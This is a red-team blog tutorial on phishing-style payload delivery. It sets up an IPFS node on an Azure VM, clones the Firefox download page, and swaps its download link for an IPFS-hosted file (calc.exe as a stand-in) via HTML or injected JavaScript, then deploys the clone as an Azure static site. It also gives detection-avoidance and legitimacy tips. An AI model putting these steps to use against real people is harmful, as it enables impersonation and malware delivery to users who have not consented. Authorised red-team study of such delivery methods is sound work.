CLOUD SECURITY

Payload Delivery with Azure Static Website and IPFS Dropper

Nairuz Abulhul
R3d Buck3T
Published in
14 min readMay 22, 2024

--

Weaponizing InterPlanetary File System and Azure Sites

Credit —

A Red Team assessment typically involves carrying out social engineering activities like phishing through emails or vishing by directly calling the targets. The list of targets is usually gathered in the early stages of the operation from public platforms such as LinkedIn, Hunter.io, ZoomInfo, etc.

The end goal is to deliver a payload to the targeted group to gain access to the internal network. There are various methods to deliver payloads, one of them through IPFS (InterPlanetary File System), which is a protocol designed to create a decentralized peer-to-peer network for storing and sharing data.

In this guide, we will use the Azure environment to set up an IPFS node on an Azure virtual machine to host our payload. We will also learn how to clone a website to make it appear legitimate for the assessment and host it on an Azure static website.

🚩Disclaimer: This is for educational purposes only to demonstrate how threat actors can use these techniques for social engineering attacks. Be responsible, and don’t perform any illegal activities!

Table of Contents

Creating Azure VM

We will use an Azure VM to install IPFS. In the Red Teaming in Cloud series, we covered the process of deploying the VM. I’ll share links to the sections that explain setting up the VM and connecting to it, so we can use it for the IPFS.

Installing IPFS

After setting up the virtual machine and connecting to it, we download the Kubo (go-ipfs) distribution, available on the IPFS Distribution site.

Kubo is an IPFS package written in Go. It provides all the functionalities required to interact with the IPFS network, including running nodes, storing and retrieving data, and communicating with other peers.

For our setup, we selected the Linux architecture of x64, which is compatible with the Azure machine created in the previous step. To install Kubo, use the wget or curl to download the files.

Figure 1 — shows the Kubo (go-ipfs) package
wget https://dist.ipfs.tech/kubo/v0.28.0/kubo_v0.28.0_linux-amd64.tar.gz
Figure 2 — shows installing kubo (go-ipfs) on the Azure VM

Then, extract the file, and move it to the “kubo” directory and run the install script. Make sure to run the script as root to avoid permission errors.

When running the script for the first time, it will move the executable “ipfs” to /user/local/bin/.

tar -xf kubo_v0.28.0_linux-amd64.tar.gz

cd kubo

sudo ./install.sh
Figure 3 — shows extracting the Kubo files and running the install script

To start, run the command ipfs.

ipfs
Figure 4 — shows running ipfs

After installing IPFS, we can create a directory named “files” to store the files we want to share. This step is optional, but it helps keep the workspace organized.

For this demonstration, we will use Windows Calculator as an example of a hosted file to represent a payload: %WinDir%\System32\calc.exe. We will use the scp command to upload the calc.exe to the files directory on the VM.

sudo scp -i IPFS-VM_key.pem calc.exe azureuser@Azure_VM_IP:/home/azureuser/ipfs/files
Figure 5 — showing uploading the file to the VM

When setting up an IPFS node, you need to run the command ipfs init. An IPFS node is essentially a computer or device connected to the IPFS network, such as a laptop, desktop, server, or smartphone.

When you initialize a node for the first time, you receive a Content Identifier (CID) for peer identity, which you should get every time you run IPFS. The CID serves as a unique fingerprint for any piece of data stored within the IPFS network.

ipfs init
Figure 6 — shows starting the ipfs node

The peer CID, along with other configuration information, is saved in the “config” file located in the .ipfs directory in the home directory.

Figure 7 — shows the location and content of the IPFS config file

To start the node, use the ipfs daemon command. This will launch the IPFS daemon in the foreground. You can use “Screento run it in the background.

ipfs daemon
#start a screen session, name can be anything
>> screen -S session_name

>> ipfs daemon

#Leave the IPFS daemon running in the background, and return to the terminal
>> press Ctrl + A followed by Ctrl + D.

#List the available sessions
>>screen -ls

#Return to IPFS session
>> screen -r sessionID
ex: screen -r 12345

When you see the Swarm information, it means the daemon is ready. In the IPFS context, “Swarm” refers to the component responsible for managing peer-to-peer connections and data exchange among nodes.

Figure 8 — shows starting the ipfs node

IPFS Web Interface

The web interface can be accessed through the default port of localhost:5001/webui. To avoid opening a port in the VM firewall to access the interface, we can use the local port forwarding trick to access it locally from our testing machine.

This approach is better from an operational security perspective to avoid getting detected by internet scanners and flagged for suspicious activities. The only port that should open to the public is port 22 for SSH.

To set up local port forwarding, we can either exit the current SSH session and re-SSH with the -L flag or use the SSH command on the current session.

The command-L 5001:127.0.0.1:5001 creates a tunnel that forwards connections from port 5001 on our local machine (Kali) to port 5001 on the remote server’s loopback interface (127.0.0.1).

This means that any traffic sent to 127.0.0.1:5001 on our local machine will be redirected through the SSH tunnel to the remote server’s 127.0.0.1:5001.

ssh azureuser@Azure_VM_IP -i Azure_VM_KEY.pem -L 5001:127.0.0.1:5001
Figure 9 — shows the IPFS web interface

To upload a file, click on the “Files” option in the side menu and import our file “Calc.exe”.

Figure 10 — shows uploading the file

Once the file is uploaded, it will receive a CID hash that cannot be changed. If you modify the file, a new hash value will be generated. To obtain the public link for the uploaded file, click on the three dots on the side and select “Share link”.

Figure 11 — shows getting the shared link for the upload file

We will use this link to embed it in the cloned site that we are going to create in the next steps.

Figure 12 — shows the shared link

The file we uploaded may take several minutes to be broadcasted to the IPFS network. Once it’s available, we can access and download the file. The default public gateway is https://ipfs.io, but we can change it to any available gateways on the IPFS Public Gateways.

We will change the default gateway to the Cloudflare IPFS network as it seems more legitimate and use the link for the Azure Site.

https://cloudflare-ipfs.com/ipfs/FILE_CID_HASH

To stop the running daemon, run ps -aux, choose the IPFS PID, and run the kill command with the PID number to stop the process.

ps -aux | grep ipfs

sudo kill +9 PID_NUMBER

Setting up Azure Static website

In this section, we will set up the Azure static website to host the cloned website we will create in the next step. To begin, search for “Static Web Apps” in the Azure portal and click “Create static web app”.

Figure 13 — shows creating a new static web app

Then, fill out the “Project Details” by selecting the subscription and resource group. When using any Azure services, it’s necessary to create a subscription first. This allows Microsoft to track the services used and bill the user accordingly. Instructions for creating a subscription are in the Red Teaming in the Cloud: Deploying Azure VMs for C2 Infrastructure guide.

Next, choose an existing “Resource group” or click on “Create new” if you don’t have one set up already. Choose a name for the site and select the “Hosting plan” type as free, and Other for the Deployment details”.

Figure 14 — shows creating a static website

Then, move to the next steps and select the default options, as seen in the screenshots below.

Figure 15 — shows selecting the Azure functions and staging details

Next, add tags. Tags are like labels that can be attached to any Azure service to help manage and track resource costs.

Figure 16 — shows adding tags

Lastly, review the added information and click “Create”. It would take a few seconds to get created. Once the site is deployed, we’ll see a “Your deployment is complete” message. Click on “Go to resource.

Figure 17 — shows deploying the site profile.

In the newly created site, click on the “Overview” section to view all the details about the site.

Figure 18 — shows the site’s overview details

Next, navigating to the URL, the screenshot below shows the default page when creating a new static site. We can use a custom domain to create something more meaningful than blue-meadow-0eeaa7210.5, but this is outside the scope of this article; we’ll discuss it in future posts.

Figure 19 — shows the default page of the Microsoft static website

Cloning Website

After creating the static site, we need to clone a website that looks legitimate to the end-user and aligns with our ruse for the social engineering assessment. We can clone the client’s official site, showcasing the tools they use, or the download page if they sell applications.

It’s crucial to have a clean, cloned site to appear legitimate. There are two Chrome extensions that I recommend for saving a complete webpage as a single HTML file with all assets (images, CSS, etc.) embedded. Install one of the following extensions:

For this demonstration, we will use the Firefox download page as an example. To clone the page, navigate to the download page and click on the Save Page WE extension. It downloads the HTML page locally. The screenshot below is for the cloned page.

Figure 20 — shows the cloned page

Once cloned, create a new directory and place the cloned page inside it. We’ll name the project “CloneSite”. In the next step, we will modify the HTML code to replace the official download link with the link to the payload hosted on the IPFS.

Installing NodeJS & NPM

Next, we need to install the Node Package Manager (npm). It is recommended to install Node.js with npm bundled to ensure compatibility and simplify the process.

For Windows, visit the official Node.js download page and install the Windows Installer.

Figure 21 — shows installing Node.js

After installation, ensure that the node.js and npm.ps1 files have been added to the “Path” in the system environment variables. Check this by opening a PowerShell terminal and running $env:path, or you can add them manually by specifying the paths for the node.js and npm files.

$env:path = "$env:path;C:\Program Files\nodejs;C:\Users\User\AppData\Roaming\npm"
Figure 22 — shows the Nod.js and npm are added to the system variables

Then, before we run the npm, we need to bypass the PowerShell execution policy to be able to run the npm.ps1 script. Otherwise, will run into the below error.

#Bypass Policy  
powershell -executionpolicy bypass
Figure 23 — shows error running the npm.ps1 script

After that, we run npm -v to check quikly check the npm version and ensure that we can run the commands in the terminal. As seen below, the command returned, the current installed version.

npm -v
Figure 24 — shows retrieving the version of the npm

Installing SWA CLI Tool

To deploy the cloned page code from our machine to the Azure static site. We will use the Static Web Apps CLI (swa) tool.

Figure 21 — shows the Static Web Apps CLI tool

Before proceeding with the installation of swa, make sure to install Python 3.12 from the Microsoft Store. If you already have python3 installed, you can skip this step.

Figure 22 — shows Python3 on Microsoft Store

Then, open Visual Studio, select the directory we created earlier, “CloneSite”, and open the terminal by going to View > Terminal.

Figures 23 & 24 — show Visual Studio

Next, bypass the PowerShell execution policy and install the swa tool by running the command below.

#Bypass Policy  
powershell -executionpolicy bypass
npm install -g @azure/static-web-apps-cli
Figure 25 — shows installing the swa tool

Code Deployment

Now that we have everything ready to push the code, we can embed the IPFS payload URL directly into the HTML code or use JavaScript to replace the original URL with ours. I’ll include both methods for learning purposes.

Go back to the cloned page and use the browser’s built-in developer tools to inspect the HTML “id” name for the download button — download-button-desktop-release-win .

Figure 26 — shows the getting the id name in HTML

Search for the “id” in Visual Studio, and replace the original download URL with the IPFS URL, then save it.

HTML
<a class="download-link os_win mzp-t-xl mzp-c-button mzp-t-product ga-product-download"
id="download-button-desktop-release-win"
href="https://cloudflare-ipfs.com/ipfs/FILE_CID_HASH" data-link-type="download"
data-display-name="Windows 32-bit"
data-download-version="win"
data-download-os="Desktop"
data-download-location="primary cta">

//Place the code the end of the file before </body></html>
<a href="https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" id="download-button-desktop-release-win"> </a>
<script>
var element = document.getElementById("download-button-desktop-release-win");
element.href = "https://cloudflare-ipfs.com/ipfs/FILE_CID_HASH";

</script>

In the developer terminal, log in to the Azure portal with the swa login command to obtain a session that will enable us to push the code.

swa login
Figure 27 — shows logging into Azure portal with swa tool

Once authenticated, it redirects to a localhost page on port 31337, stating that the authentication was complete. Sometimes, the page doesn’t pop up quickly after the authentication. If that happens, run the swa login command again.

Figure 28 — shows successful authentication with swa

In the terminal, we can see that we have successfully authenticated to Azure and are presented with the available tenants. We can choose the tenant for which our Static site will be located.

Figure 29 — shows the available tenants

To check your current working tenant, access the Azure portal and click the Terminal icon on the top right, next to your account name.

Once the terminal is active, run the Get-AzTenant command. It will provide you with the tenant information, such as the ID and the domain it’s connected to. Use the arrow to select which one to use, and press enter.

Get-AzTenant
Figure 30 — shows running the Az PowerShell command to get the available tenants.

After logging in with swa, a new .env file is created in the CloneSite directory. This file contains the subscription ID and the tenant ID that will be used for code deployment.

To deploy the code with swa, you need to create a configuration file in the same directory by running swa only. This will initiate the configuration file and ask if you want to name it the same as the site name.

Keep it as default and press enter. When asked if the settings are correct, press “Y”.

Figure 31 — shows running swa to set up the configuration file

When prompted to deploy to your app, type “Y” and press Enter. If asked whether you want to create a new app, type “N” and press Enter.

Figure 32 — shows continuing with swa configuration setup

Since we already have an app created, we will use the deployment token to deploy our app. The deployment token method is useful when you have multiple apps created and want to specify which ones to deploy to.

To obtain the deployment token, go to the Azure portal, navigate to the static site we created, and in the overview section, click on “Manage Deployment Token”, then copy the token.

Figure 33 — shows the location of the deployment token.

After running the swa command, the configuration file will be created as a JSON file called swa-cli.config.json in the main CloneSite directory.

Figure 34 — shows the created configuration file with swa

💡An important tip is that if you place your index.html file directly in the CloneSite, SWA will not deploy it. It won’t display errors, but the website will contain empty content.

To avoid this, create a new directory called “firefox-clone-site” and place your code (the index.html) there. The directory structure is shown in the screenshot below.

Also, make sure to name your HTML page as “index.html” with a lowercase “i”; otherwise, it won’t deploy.

Figure 35 — shows the directory structure

Now that we have the proper structure for the project, we can deploy the project with swa deploy command. Next, we need to specify the environment as “production”. If the environment is not specified, the project will be deployed in the preview environment instead of production.

swa deploy .\CloneSite\firefox-clone-site\ --deployment-token TOKEN--env production
Figure 36 — shows the deployed code on Azure static website

When we click on the download button, we get the file hosted on the IPFS. The behavior of browsers varies — Edge and Firefox install it directly, as shown in the screenshot.

Figure 37 — shows downloading the calc.exe file in Edge

While Chrome will prompt a “Save As” window to save the executable. In the social engineering assessment, it doesn’t matter much if we have a good pretext to convince the user to run the executable.

Figure 38 — shows downloading the calc.exe file in Chrome

To make it appear more legitimate, we can specify a custom domain instead of “blue-meadow-0eeaa7210.5”. We won’t include it in this post, but we will cover it in future posts.

Today, we learned how to set up an IPFS node on Azure VM and host a payload file. Then, we cloned a website and deployed it on the Azure Static website, which redirects us to the IPFS hosted payload.

That’s all for today, see you next time!

--

--

Nairuz Abulhul
R3d Buck3T

I spend 70% of the time reading security stuff and 30% trying to make it work !!! aka Pentester [+] Publication: R3d Buck3T